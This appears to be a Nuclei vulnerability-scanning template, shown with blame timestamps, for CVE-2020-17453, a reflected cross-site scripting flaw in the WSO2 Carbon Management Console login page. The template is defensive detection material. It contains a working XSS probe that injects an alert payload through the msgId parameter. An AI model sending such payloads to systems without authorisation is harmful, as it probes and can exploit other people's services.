2021-03-24 15:35:32 +00:00
id : CVE-2020-17453
info :
2022-05-09 16:12:52 +00:00
name : WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
2021-03-24 15:35:32 +00:00
author : madrobot
severity : medium
2022-05-09 16:12:52 +00:00
description : WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
2022-04-22 10:38:41 +00:00
reference :
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
2022-05-17 09:18:12 +00:00
- https://twitter.com/JacksonHHax/status/1374681422678519813
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-17453
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.01736
cpe : cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wso2
product : api_manager
tags : xss,wso2,cve2020,cve
2021-03-24 15:35:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-24 15:35:32 +00:00
- method : GET
path :
- '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
2021-03-24 17:12:56 +00:00
2021-03-24 15:35:32 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-03-24 15:35:32 +00:00
words :
- "'';alert('nuclei')//';"
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-03-24 15:35:32 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200